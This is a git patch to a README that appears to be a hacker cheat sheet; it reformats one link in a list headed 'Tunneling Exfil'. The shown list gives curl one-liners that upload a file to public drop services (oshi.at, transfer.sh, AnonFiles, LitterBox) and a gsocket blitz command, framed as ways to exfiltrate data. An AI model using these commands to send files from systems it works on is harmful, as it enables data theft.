From 77eb3a1daacfdda63bc292a9c90477095d210c4a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 25 May 2023 12:15:09 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6923fb1..50ea98c 100644 --- a/README.md +++ b/README.md @@ -1470,7 +1470,7 @@ Tunneling Exfil 1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt` 1. [Mega](https://mega.io/cmd) -2. https://oshi.at/ - also on TOR. `curl -T foo.txt https://oshi.at` +2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at` 4. [AnonFiles](https://www.anonfiles.com) - `curl -F "file=@foo.txt" https://api.anonfiles.com/upload` 5. [Transfer.sh](https://transfer.sh/) - `curl -T foo.txt https://transfer.sh` 6. [LitterBox](https://litterbox.catbox.moe/tools.php) - `curl -F reqtype=fileupload -F time=72h -F 'fileToUpload=@foo.txt' https://litterbox.catbox.moe/resources/internals/api.php`